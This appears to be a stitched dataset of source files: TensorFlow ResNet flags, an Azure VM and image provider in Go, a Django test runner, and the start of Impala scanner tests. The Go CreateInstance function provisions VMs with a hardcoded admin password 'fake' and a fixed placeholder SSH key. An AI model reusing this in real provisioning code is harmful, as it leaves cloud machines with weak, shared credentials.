classifier.export_savedmodel(flags_obj.export_dir, input_receiver_fn,
strip_default_attrs=True)
return eval_results
def define_resnet_flags(resnet_size_choices=None):
"""Add flags and validators for ResNet."""
flags_core.define_base()
flags_core.define_performance(num_parallel_calls=False,
tf_gpu_thread_mode=True,
datasets_num_private_threads=True,
datasets_num_parallel_batches=True)
flags_core.define_image()
flags_core.define_benchmark()
flags.adopt_module_key_flags(flags_core)
flags.DEFINE_enum(
name='resnet_version', short_name='rv', default='1',
enum_values=['1', '2'],
help=flags_core.help_wrap(
'Version of ResNet. (1 or 2) See README.md for details.'))
flags.DEFINE_bool(
name='fine_tune', short_name='ft', default=False,
help=flags_core.help_wrap(
'If True do not train any parameters except for the final layer.'))
flags.DEFINE_string(
name='pretrained_model_checkpoint_path', short_name='pmcp', default=None,
help=flags_core.help_wrap(
'If not None initialize all the network except the final layer with '
'these values'))
flags.DEFINE_boolean(
name='eval_only', default=False,
help=flags_core.help_wrap('Skip training and only perform evaluation on '
'the latest checkpoint.'))
flags.DEFINE_boolean(
name='image_bytes_as_serving_input', default=False,
help=flags_core.help_wrap(
'If True exports savedmodel with serving signature that accepts '
'JPEG image bytes instead of a fixed size [HxWxC] tensor that '
'represents the image. The former is easier to use for serving at '
'the expense of image resize/cropping being done as part of model '
'inference. Note, this flag only applies to ImageNet and cannot '
'be used for CIFAR.'))
flags.DEFINE_boolean(
name='turn_off_distribution_strategy', default=False,
help=flags_core.help_wrap('Set to True to not use distribution '
'strategies.'))
choice_kwargs = dict(
name='resnet_size', short_name='rs', default='50',
help=flags_core.help_wrap('The size of the ResNet model to use.'))
if resnet_size_choices is None:
flags.DEFINE_string(**choice_kwargs)
else:
flags.DEFINE_enum(enum_values=resnet_size_choices, **choice_kwargs)
|
[] |
[] |
[
"TF_GPU_THREAD_MODE",
"TF_GPU_THREAD_COUNT"
] |
[]
|
["TF_GPU_THREAD_MODE", "TF_GPU_THREAD_COUNT"]
|
python
| 2 | 0 | |
lepton/azure.go
|
package lepton
import (
"bytes"
"context"
"fmt"
"net/url"
"os"
"path/filepath"
"strings"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/adal"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/autorest/to"
"github.com/Azure/azure-sdk-for-go/services/compute/mgmt/2020-06-01/compute"
"github.com/Azure/azure-storage-blob-go/azblob"
"github.com/olekukonko/tablewriter"
)
// most of this is ripped from the samples repo:
// https://github.com/Azure-Samples/azure-sdk-for-go-samples/blob/master/compute/vm.go
// the azure sdk is fairly roundabout and could use some heavy
// refactoring
const (
userAgent = "ops"
fakepubkey = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7laRyN4B3YZmVrDEZLZoIuUA72pQ0DpGuZBZWykCofIfCPrFZAJgFvonKGgKJl6FGKIunkZL9Us/mV4ZPkZhBlE7uX83AAf5i9Q8FmKpotzmaxN10/1mcnEE7pFvLoSkwqrQSkrrgSm8zaJ3g91giXSbtqvSIj/vk2f05stYmLfhAwNo3Oh27ugCakCoVeuCrZkvHMaJgcYrIGCuFo6q0Pfk9rsZyriIqEa9AtiUOtViInVYdby7y71wcbl0AbbCZsTSqnSoVxm2tRkOsXV6+8X4SnwcmZbao3H+zfO1GBhQOLxJ4NQbzAa8IJh810rYARNLptgmsd4cYXVOSosTX azureuser"
)
var (
environment *azure.Environment
armAuthorizer autorest.Authorizer
cloudName = "AzurePublicCloud"
)
// Azure contains all operations for Azure
type Azure struct {
Storage *AzureStorage
subID string
clientID string
tenantID string
clientSecret string
locationDefault string
groupName string
}
// Environment returns an `azure.Environment{...}` for the current
// cloud.
func (a *Azure) Environment() *azure.Environment {
if environment != nil {
return environment
}
env, err := azure.EnvironmentFromName(cloudName)
if err != nil {
// TODO: move to initialization of var
panic(fmt.Sprintf(
"invalid cloud name '%s' specified, cannot continue\n", cloudName))
}
environment = &env
return environment
}
func (a *Azure) getAuthorizerForResource(resource string) (autorest.Authorizer, error) {
var authr autorest.Authorizer
var err error
oauthConfig, err := adal.NewOAuthConfig(
a.Environment().ActiveDirectoryEndpoint, a.tenantID)
if err != nil {
return nil, err
}
token, err := adal.NewServicePrincipalToken(
*oauthConfig, a.clientID, a.clientSecret, resource)
if err != nil {
return nil, err
}
authr = autorest.NewBearerAuthorizer(token)
return authr, err
}
// GetResourceManagementAuthorizer returns an autorest authorizer.
func (a *Azure) GetResourceManagementAuthorizer() (autorest.Authorizer, error) {
if armAuthorizer != nil {
return armAuthorizer, nil
}
var authr autorest.Authorizer
var err error
authr, err = a.getAuthorizerForResource(a.Environment().ResourceManagerEndpoint)
if err == nil {
// cache
armAuthorizer = authr
} else {
// clear cache
armAuthorizer = nil
}
return armAuthorizer, err
}
func (a *Azure) getImagesClient() compute.ImagesClient {
vmClient := compute.NewImagesClientWithBaseURI(compute.DefaultBaseURI, a.subID)
authr, _ := a.GetResourceManagementAuthorizer()
vmClient.Authorizer = authr
vmClient.AddToUserAgent(userAgent)
return vmClient
}
func (a *Azure) getVMClient() compute.VirtualMachinesClient {
vmClient := compute.NewVirtualMachinesClient(a.subID)
authr, _ := a.GetResourceManagementAuthorizer()
vmClient.Authorizer = authr
vmClient.AddToUserAgent(userAgent)
return vmClient
}
func (a *Azure) getVMExtensionsClient() compute.VirtualMachineExtensionsClient {
extClient := compute.NewVirtualMachineExtensionsClient(a.subID)
authr, _ := a.GetResourceManagementAuthorizer()
extClient.Authorizer = authr
extClient.AddToUserAgent(userAgent)
return extClient
}
func (a *Azure) getLocation(ctx *Context) string {
c := ctx.config
location := c.CloudConfig.Zone
if location == "" {
location = a.locationDefault
}
if location == "" {
fmt.Println("Error: a location must be set via either the Zone attribute in CloudConfig or the AZURE_LOCATION_DEFAULT environment variable.")
os.Exit(1)
}
return location
}
// GetVM gets the specified VM info
func (a *Azure) GetVM(ctx context.Context, vmName string) (compute.VirtualMachine, error) {
vmClient := a.getVMClient()
return vmClient.Get(ctx, a.groupName, vmName, compute.InstanceView)
}
// RestartVM restarts the selected VM
func (a *Azure) RestartVM(ctx context.Context, vmName string) (osr autorest.Response, err error) {
vmClient := a.getVMClient()
future, err := vmClient.Restart(ctx, a.groupName, vmName)
if err != nil {
return osr, fmt.Errorf("cannot restart vm: %v", err)
}
err = future.WaitForCompletionRef(ctx, vmClient.Client)
if err != nil {
return osr, fmt.Errorf("cannot get the vm restart future response: %v", err)
}
return future.Result(vmClient)
}
func (a *Azure) getArchiveName(ctx *Context) string {
return ctx.config.CloudConfig.ImageName + ".tar.gz"
}
func (a *Azure) customizeImage(ctx *Context) (string, error) {
imagePath := ctx.config.RunConfig.Imagename
symlink := filepath.Join(filepath.Dir(imagePath), "disk.raw")
if _, err := os.Lstat(symlink); err == nil {
if err := os.Remove(symlink); err != nil {
return "", fmt.Errorf("failed to unlink: %+v", err)
}
}
err := os.Link(imagePath, symlink)
if err != nil {
return "", err
}
archPath := filepath.Join(filepath.Dir(imagePath), a.getArchiveName(ctx))
files := []string{symlink}
err = createArchive(archPath, files)
if err != nil {
return "", err
}
return archPath, nil
}
// BuildImage builds an image to be uploaded to Azure
func (a *Azure) BuildImage(ctx *Context) (string, error) {
c := ctx.config
err := BuildImage(*c)
if err != nil {
return "", err
}
return a.customizeImage(ctx)
}
// BuildImageWithPackage builds an image with a package to be uploaded to Azure
func (a *Azure) BuildImageWithPackage(ctx *Context, pkgpath string) (string, error) {
c := ctx.config
err := BuildImageFromPackage(pkgpath, *c)
if err != nil {
return "", err
}
return a.customizeImage(ctx)
}
// Initialize Azure related things
func (a *Azure) Initialize() error {
a.Storage = &AzureStorage{}
subID := os.Getenv("AZURE_SUBSCRIPTION_ID")
if subID != "" {
a.subID = subID
}
locationDefault := os.Getenv("AZURE_LOCATION_DEFAULT")
if locationDefault != "" {
a.locationDefault = locationDefault
}
tenantID := os.Getenv("AZURE_TENANT_ID")
if tenantID != "" {
a.tenantID = tenantID
}
clientID := os.Getenv("AZURE_CLIENT_ID")
if clientID != "" {
a.clientID = clientID
}
clientSecret := os.Getenv("AZURE_CLIENT_SECRET")
if clientSecret != "" {
a.clientSecret = clientSecret
}
groupName := os.Getenv("AZURE_BASE_GROUP_NAME")
if groupName != "" {
a.groupName = groupName
}
return nil
}
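// Illustrative sketch (an addition, not part of the original file): a minimal,
// hypothetical example of how the AZURE_* environment variables read above feed an
// Azure value before any of the SDK clients in this file are used. Nothing calls this
// function; it only exercises Initialize and the cached ARM authorizer.
func exampleInitializeFromEnv() (*Azure, error) {
	a := &Azure{}
	// Picks up AZURE_SUBSCRIPTION_ID, AZURE_TENANT_ID, AZURE_CLIENT_ID,
	// AZURE_CLIENT_SECRET, AZURE_BASE_GROUP_NAME and AZURE_LOCATION_DEFAULT.
	if err := a.Initialize(); err != nil {
		return nil, err
	}
	// Builds (and caches) the bearer-token authorizer backing the clients below.
	if _, err := a.GetResourceManagementAuthorizer(); err != nil {
		return nil, err
	}
	return a, nil
}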
// CreateImage - Creates image on Azure using nanos images
func (a *Azure) CreateImage(ctx *Context) error {
imagesClient := a.getImagesClient()
c := ctx.config
imgName := c.CloudConfig.ImageName
bucket := c.CloudConfig.BucketName
region := a.getLocation(ctx)
container := "quickstart-nanos"
disk := c.CloudConfig.ImageName + ".vhd"
uri := "https://" + bucket + ".blob.core.windows.net/" + container + "/" + disk
imageParams := compute.Image{
Location: to.StringPtr(region),
ImageProperties: &compute.ImageProperties{
StorageProfile: &compute.ImageStorageProfile{
OsDisk: &compute.ImageOSDisk{
OsType: compute.Linux,
BlobURI: to.StringPtr(uri),
OsState: compute.Generalized,
},
},
HyperVGeneration: compute.HyperVGenerationTypesV1,
},
}
res, err := imagesClient.CreateOrUpdate(context.TODO(), a.groupName, imgName, imageParams)
if err != nil {
fmt.Println(err)
}
fmt.Printf("%+v", res)
return nil
}
// GetImages returns all images for Azure
func (a *Azure) GetImages(ctx *Context) ([]CloudImage, error) {
var cimages []CloudImage
imagesClient := a.getImagesClient()
images, err := imagesClient.List(context.TODO())
if err != nil {
fmt.Println(err)
}
imgs := images.Values()
for _, image := range imgs {
cImage := CloudImage{
Name: *image.Name,
Status: *(*image.ImageProperties).ProvisioningState,
}
cimages = append(cimages, cImage)
}
return cimages, nil
}
// ListImages lists images on azure
func (a *Azure) ListImages(ctx *Context) error {
cimages, err := a.GetImages(ctx)
if err != nil {
return err
}
table := tablewriter.NewWriter(os.Stdout)
table.SetHeader([]string{"Name", "Status", "Created"})
table.SetHeaderColor(
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor})
table.SetRowLine(true)
for _, image := range cimages {
var row []string
row = append(row, image.Name)
row = append(row, image.Status)
row = append(row, "")
table.Append(row)
}
table.Render()
return nil
}
// DeleteImage deletes image from Azure
func (a *Azure) DeleteImage(ctx *Context, imagename string) error {
imagesClient := a.getImagesClient()
fut, err := imagesClient.Delete(context.TODO(), a.groupName, imagename)
if err != nil {
fmt.Println(err)
}
fmt.Printf("%+v", fut)
return nil
}
// SyncImage syncs an image from one provider to another
func (a *Azure) SyncImage(config *Config, target Provider, image string) error {
fmt.Println("not yet implemented")
return nil
}
// CreateInstance - Creates instance on azure Platform
//
// this is kind of a pita
// you have to create the following:
// {vnet, nsg, subnet, ip, nic} before creating the vm
//
// unfortunately this is going to take some serious re-factoring later
// on w/these massive assumptions being put into place
func (a *Azure) CreateInstance(ctx *Context) error {
username := "fake"
password := "fake"
c := ctx.config
bucket := c.CloudConfig.BucketName
if bucket == "" {
bucket = os.Getenv("AZURE_STORAGE_ACCOUNT")
}
if bucket == "" {
fmt.Println("AZURE_STORAGE_ACCOUNT should be set otherwise logs can not be retrieved.")
os.Exit(1)
}
location := a.getLocation(ctx)
debug := false
vmName := ctx.config.CloudConfig.ImageName
fmt.Printf("spinning up:\t%s\n", vmName)
// create virtual network
vnet, err := a.CreateVirtualNetwork(context.TODO(), location, vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", vnet)
}
// create nsg
nsg, err := a.CreateNetworkSecurityGroup(context.TODO(), location, vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", nsg)
}
// create subnet
subnet, err := a.CreateSubnetWithNetworkSecurityGroup(context.TODO(), vmName, vmName, "10.0.0.0/24", vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", subnet)
}
// create ip
ip, err := a.CreatePublicIP(context.TODO(), location, vmName)
if err != nil {
fmt.Println(err)
}
if debug {
fmt.Printf("%+v\n", ip)
}
// create nic
// pass vnet, subnet, ip, nicname
nic, err := a.CreateNIC(context.TODO(), location, vmName, vmName, vmName, vmName, vmName)
if err != nil {
fmt.Println(err)
}
sshKeyData := fakepubkey
nctx := context.TODO()
fmt.Println("creating the vm - this can take a few minutes - you can ctrl-c this after a bit")
fmt.Println("there is a known issue that prevents the deploy from ever being 'done'")
vmClient := a.getVMClient()
future, err := vmClient.CreateOrUpdate(
nctx,
a.groupName,
vmName,
compute.VirtualMachine{
Location: to.StringPtr(location),
VirtualMachineProperties: &compute.VirtualMachineProperties{
HardwareProfile: &compute.HardwareProfile{
VMSize: compute.VirtualMachineSizeTypesStandardA1V2,
},
StorageProfile: &compute.StorageProfile{
ImageReference: &compute.ImageReference{
ID: to.StringPtr("/subscriptions/" + a.subID + "/resourceGroups/" + a.groupName + "/providers/Microsoft.Compute/images/" + vmName),
},
},
DiagnosticsProfile: &compute.DiagnosticsProfile{
BootDiagnostics: &compute.BootDiagnostics{
Enabled: to.BoolPtr(true),
StorageURI: to.StringPtr("https://" + bucket + ".blob.core.windows.net/"),
},
},
OsProfile: &compute.OSProfile{
ComputerName: to.StringPtr(vmName),
AdminUsername: to.StringPtr(username),
AdminPassword: to.StringPtr(password),
LinuxConfiguration: &compute.LinuxConfiguration{
SSH: &compute.SSHConfiguration{
PublicKeys: &[]compute.SSHPublicKey{
{
Path: to.StringPtr(
fmt.Sprintf("/home/%s/.ssh/authorized_keys",
username)),
KeyData: to.StringPtr(sshKeyData),
},
},
},
},
},
NetworkProfile: &compute.NetworkProfile{
NetworkInterfaces: &[]compute.NetworkInterfaceReference{
{
ID: nic.ID,
NetworkInterfaceReferenceProperties: &compute.NetworkInterfaceReferenceProperties{
Primary: to.BoolPtr(true),
},
},
},
},
},
},
)
if err != nil {
fmt.Printf("cannot create vm: %v\n", err.Error())
os.Exit(1)
}
err = future.WaitForCompletionRef(nctx, vmClient.Client)
if err != nil {
fmt.Printf("cannot get the vm create or update future response: %v\n", err.Error())
os.Exit(1)
}
vm, err := future.Result(vmClient)
if err != nil {
fmt.Println(err)
}
fmt.Printf("%+v\n", vm)
return nil
}
// GetInstanceByID returns the instance with the id passed by argument if it exists
func (a *Azure) GetInstanceByID(ctx *Context, id string) (*CloudInstance, error) {
vmClient := a.getVMClient()
vm, err := vmClient.Get(context.TODO(), a.groupName, id, compute.InstanceView)
if err != nil {
return nil, err
}
return a.convertToCloudInstance(&vm), nil
}
// GetInstances returns all instances on Azure
func (a *Azure) GetInstances(ctx *Context) ([]CloudInstance, error) {
var cinstances []CloudInstance
vmClient := a.getVMClient()
vmlist, err := vmClient.List(context.TODO(), a.groupName)
if err != nil {
fmt.Println(err)
}
instances := vmlist.Values()
for _, instance := range instances {
cinstance := a.convertToCloudInstance(&instance)
cinstances = append(cinstances, *cinstance)
}
return cinstances, nil
}
func (a *Azure) convertToCloudInstance(instance *compute.VirtualMachine) *CloudInstance {
cinstance := CloudInstance{
Name: *instance.Name,
}
privateIP := ""
publicIP := ""
if instance.VirtualMachineProperties != nil {
nifs := *((*(*instance.VirtualMachineProperties).NetworkProfile).NetworkInterfaces)
for i := 0; i < len(nifs); i++ {
nicClient := a.getNicClient()
nic, err := nicClient.Get(context.TODO(), a.groupName, cinstance.Name, "")
if err != nil {
fmt.Println(err)
}
if nic.InterfacePropertiesFormat != nil {
ipconfig := *(*nic.InterfacePropertiesFormat).IPConfigurations
for x := 0; x < len(ipconfig); x++ {
format := *ipconfig[x].InterfaceIPConfigurationPropertiesFormat
privateIP = *format.PrivateIPAddress
ipClient := a.getIPClient()
pubip, err := ipClient.Get(context.TODO(), a.groupName, cinstance.Name, "")
if err != nil {
fmt.Println(err)
}
publicIP = *(*pubip.PublicIPAddressPropertiesFormat).IPAddress
}
}
}
}
cinstance.PrivateIps = []string{privateIP}
cinstance.PublicIps = []string{publicIP}
return &cinstance
}
// ListInstances lists instances on Azure
func (a *Azure) ListInstances(ctx *Context) error {
cinstances, err := a.GetInstances(ctx)
if err != nil {
return err
}
table := tablewriter.NewWriter(os.Stdout)
table.SetHeader([]string{"Name", "Status", "Created", "Private Ips", "Public Ips"})
table.SetHeaderColor(
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor},
tablewriter.Colors{tablewriter.Bold, tablewriter.FgCyanColor})
table.SetRowLine(true)
for _, instance := range cinstances {
var rows []string
rows = append(rows, instance.Name)
rows = append(rows, "")
rows = append(rows, "")
rows = append(rows, strings.Join(instance.PrivateIps, ","))
rows = append(rows, strings.Join(instance.PublicIps, ","))
table.Append(rows)
}
table.Render()
return nil
}
// DeleteInstance deletes instance from Azure
func (a *Azure) DeleteInstance(ctx *Context, instancename string) error {
fmt.Println("un-implemented")
return nil
}
// StartInstance starts an instance in Azure
func (a *Azure) StartInstance(ctx *Context, instancename string) error {
fmt.Println("un-implemented")
vmClient := a.getVMClient()
future, err := vmClient.Start(context.TODO(), a.groupName, instancename)
if err != nil {
fmt.Printf("cannot start vm: %v\n", err.Error())
os.Exit(1)
}
err = future.WaitForCompletionRef(context.TODO(), vmClient.Client)
if err != nil {
fmt.Printf("cannot get the vm start future response: %v\n", err.Error())
os.Exit(1)
}
return nil
}
// StopInstance stops an instance on Azure
func (a *Azure) StopInstance(ctx *Context, instancename string) error {
vmClient := a.getVMClient()
// skipShutdown parameter is optional, we are taking its default
// value here
future, err := vmClient.PowerOff(context.TODO(), a.groupName, instancename, nil)
if err != nil {
fmt.Printf("cannot power off vm: %v\n", err.Error())
os.Exit(1)
}
err = future.WaitForCompletionRef(context.TODO(), vmClient.Client)
if err != nil {
fmt.Printf("cannot get the vm power off future response: %v\n", err.Error())
os.Exit(1)
}
fmt.Println("un-implemented")
return nil
}
// PrintInstanceLogs writes instance logs to console
func (a *Azure) PrintInstanceLogs(ctx *Context, instancename string, watch bool) error {
l, err := a.GetInstanceLogs(ctx, instancename)
if err != nil {
return err
}
fmt.Print(l)
return nil
}
// GetInstanceLogs gets instance related logs
func (a *Azure) GetInstanceLogs(ctx *Context, instancename string) (string, error) {
// this is basically 2 calls
// 1) grab the log location
// 2) grab it from storage
accountName, accountKey := os.Getenv("AZURE_STORAGE_ACCOUNT"), os.Getenv("AZURE_STORAGE_ACCESS_KEY")
if len(accountName) == 0 || len(accountKey) == 0 {
fmt.Println("Either the AZURE_STORAGE_ACCOUNT or AZURE_STORAGE_ACCESS_KEY environment variable is not set")
}
credential, err := azblob.NewSharedKeyCredential(accountName, accountKey)
if err != nil {
fmt.Printf("Invalid credentials with error: %s\n", err.Error())
}
p := azblob.NewPipeline(credential, azblob.PipelineOptions{})
URL, _ := url.Parse(
fmt.Sprintf("https://%s.blob.core.windows.net/", accountName))
containerURL := azblob.NewContainerURL(*URL, p)
vmName := instancename
vmClient := a.getVMClient()
vm, err := vmClient.Get(context.TODO(), a.groupName, vmName, compute.InstanceView)
if err != nil {
fmt.Println(err)
os.Exit(1)
}
// this is unique per vm || per boot?
vmid := to.String(vm.VMID)
// this has a unique expected format apparently
// the first part of the name in the uri is capped at 10 chars but
// not the 2nd part?
firstName := strings.ReplaceAll(vmName, "-", "")
if len(firstName) > 10 {
firstName = firstName[0:9]
}
fname := "bootdiagnostics" + "-" + firstName + "-" + vmid + "/" + vmName + "." + vmid +
".serialconsole.log"
blobURL := containerURL.NewBlockBlobURL(fname)
get, err := blobURL.Download(context.TODO(), 0, 0, azblob.BlobAccessConditions{}, false)
if err != nil {
return "", err
}
downloadedData := &bytes.Buffer{}
reader := get.Body(azblob.RetryReaderOptions{})
downloadedData.ReadFrom(reader)
reader.Close()
return downloadedData.String(), nil
}
// ResizeImage is not supported on azure.
func (a *Azure) ResizeImage(ctx *Context, imagename string, hbytes string) error {
return fmt.Errorf("Operation not supported")
}
// GetStorage returns storage interface for cloud provider
func (a *Azure) GetStorage() Storage {
return a.Storage
}
|
[
"\"AZURE_SUBSCRIPTION_ID\"",
"\"AZURE_LOCATION_DEFAULT\"",
"\"AZURE_TENANT_ID\"",
"\"AZURE_CLIENT_ID\"",
"\"AZURE_CLIENT_SECRET\"",
"\"AZURE_BASE_GROUP_NAME\"",
"\"AZURE_STORAGE_ACCOUNT\"",
"\"AZURE_STORAGE_ACCOUNT\"",
"\"AZURE_STORAGE_ACCESS_KEY\""
] |
[] |
[
"AZURE_LOCATION_DEFAULT",
"AZURE_BASE_GROUP_NAME",
"AZURE_STORAGE_ACCOUNT",
"AZURE_STORAGE_ACCESS_KEY",
"AZURE_CLIENT_ID",
"AZURE_CLIENT_SECRET",
"AZURE_TENANT_ID",
"AZURE_SUBSCRIPTION_ID"
] |
[]
|
["AZURE_LOCATION_DEFAULT", "AZURE_BASE_GROUP_NAME", "AZURE_STORAGE_ACCOUNT", "AZURE_STORAGE_ACCESS_KEY", "AZURE_CLIENT_ID", "AZURE_CLIENT_SECRET", "AZURE_TENANT_ID", "AZURE_SUBSCRIPTION_ID"]
|
go
| 8 | 0 | |
tests/runtests-fakeredis.py
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, '..')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_fakeredis")
if __name__ == "__main__":
from django.core.management import execute_from_command_line
args = sys.argv
args.insert(1, "test")
if len(args) == 2:
args.insert(2, "redis_backend_testapp")
args.insert(3, "hashring_test")
execute_from_command_line(args)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/query_test/test_scanners.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This test suite validates the scanners by running queries against ALL file formats and
# their permutations (e.g. compression codec/compression type). This works by exhaustively
# generating the table format test vectors for this specific test suite. This way, other
# tests can run with the normal exploration strategy and the overall test runtime doesn't
# explode.
import os
import pytest
import random
import re
import tempfile
from copy import deepcopy
from parquet.ttypes import ConvertedType
from subprocess import check_call
from testdata.common import widetable
from tests.common.file_utils import create_table_and_copy_files
from tests.common.impala_test_suite import ImpalaTestSuite, LOG
from tests.common.skip import (
SkipIf,
SkipIfS3,
SkipIfGCS,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfHive2,
SkipIfHive3,
SkipIfIsilon,
SkipIfLocal,
SkipIfNotHdfsMinicluster)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.file_utils import (
create_table_from_parquet,
create_table_and_copy_files)
from tests.common.test_result_verifier import (
QueryTestResult,
parse_result_rows)
from tests.common.test_vector import ImpalaTestDimension
from tests.util.filesystem_utils import IS_HDFS, WAREHOUSE, get_fs_path
from tests.util.hdfs_util import NAMENODE
from tests.util.get_parquet_metadata import get_parquet_metadata
from tests.util.parse_util import get_bytes_summary_stats_counter
from tests.util.test_file_parser import QueryTestSectionReader
# Test scanners with denial of reservations at varying frequency. This will affect the
# number of scanner threads that can be spun up.
DEBUG_ACTION_DIMS = [None,
'-1:OPEN:SET_DENY_RESERVATION_PROBABILITY@0.5',
'-1:OPEN:SET_DENY_RESERVATION_PROBABILITY@1.0']
# Trigger injected soft limit failures when scanner threads check memory limit.
DEBUG_ACTION_DIMS.append('HDFS_SCANNER_THREAD_CHECK_SOFT_MEM_LIMIT:FAIL@0.5')
MT_DOP_VALUES = [0, 1, 4]
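# Illustrative sketch (an addition, not part of the upstream suite): the debug_action
# and batch_size dimensions declared above are consumed by copying them from the test
# vector into the matching query options, which the test methods below do inline. A
# hypothetical standalone helper doing the same thing would look like this; it is not
# referenced anywhere else in this module.
def _example_apply_scanner_dims(vector):
  new_vector = deepcopy(vector)
  new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
  new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
  return new_vector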
class TestScannersAllTableFormats(ImpalaTestSuite):
BATCH_SIZES = [0, 1, 16]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannersAllTableFormats, cls).add_test_dimensions()
if cls.exploration_strategy() == 'core':
# The purpose of this test is to get some base coverage of all the file formats.
# Even in 'core', we'll test each format by using the pairwise strategy.
cls.ImpalaTestMatrix.add_dimension(cls.create_table_info_dimension('pairwise'))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('batch_size', *TestScannersAllTableFormats.BATCH_SIZES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('debug_action', *DEBUG_ACTION_DIMS))
def test_scanners(self, vector):
new_vector = deepcopy(vector)
# Copy over test dimensions to the matching query options.
new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
self.run_test_case('QueryTest/scanners', new_vector)
def test_many_nulls(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
# manynulls table not loaded for HBase
pytest.skip()
# Copy over test dimensions to the matching query options.
new_vector = deepcopy(vector)
new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
self.run_test_case('QueryTest/scanners-many-nulls', new_vector)
def test_hdfs_scanner_profile(self, vector):
if vector.get_value('table_format').file_format in ('kudu', 'hbase') or \
vector.get_value('exec_option')['num_nodes'] != 0:
pytest.skip()
self.run_test_case('QueryTest/hdfs_scanner_profile', vector)
def test_string_escaping(self, vector):
"""Test handling of string escape sequences."""
if vector.get_value('table_format').file_format == 'rc':
# IMPALA-7778: RCFile scanner incorrectly ignores escapes for now.
self.run_test_case('QueryTest/string-escaping-rcfile-bug', vector)
else:
self.run_test_case('QueryTest/string-escaping', vector)
# Test all the scanners with a simple limit clause. The limit clause triggers
# cancellation in the scanner code paths.
class TestScannersAllTableFormatsWithLimit(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannersAllTableFormatsWithLimit, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension('mt_dop', *MT_DOP_VALUES))
def test_limit(self, vector):
vector.get_value('exec_option')['abort_on_error'] = 1
self._test_limit(vector)
# IMPALA-3337: when continuing on error, the error log should not show errors
# (e.g. "Cancelled").
vector.get_value('exec_option')['abort_on_error'] = 0
self._test_limit(vector)
def _test_limit(self, vector):
# Use a small batch size so changing the limit affects the timing of cancellation
vector.get_value('exec_option')['batch_size'] = 100
iterations = 50
query_template = "select * from alltypes limit %s"
for i in range(1, iterations):
# Vary the limit to vary the timing of cancellation
limit = (i * 100) % 1001 + 1
query = query_template % limit
result = self.execute_query(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
assert len(result.data) == limit
# IMPALA-3337: The error log should be empty.
assert not result.log
class TestScannersMixedTableFormats(ImpalaTestSuite):
BATCH_SIZES = [0, 1, 16]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannersMixedTableFormats, cls).add_test_dimensions()
# Only run with a single dimension format, since the table includes mixed formats.
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('batch_size', *TestScannersAllTableFormats.BATCH_SIZES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('debug_action', *DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension('mt_dop', *MT_DOP_VALUES))
def test_mixed_format(self, vector):
new_vector = deepcopy(vector)
new_vector.get_value('exec_option')['batch_size'] = vector.get_value('batch_size')
new_vector.get_value('exec_option')['debug_action'] = vector.get_value('debug_action')
self.run_test_case('QueryTest/mixed-format', new_vector)
# Test case to verify the scanners work properly when the table metadata (specifically the
# number of columns in the table) does not match the number of columns in the data file.
class TestUnmatchedSchema(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestUnmatchedSchema, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# Avro has a more advanced schema evolution process which is covered in more depth
# in the test_avro_schema_evolution test suite.
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format != 'avro')
def _create_test_table(self, vector, unique_database):
"""
Creates the test table
Cannot be done in a setup method because we need access to the current test vector
"""
file_format = vector.get_value('table_format').file_format
if file_format == 'orc':
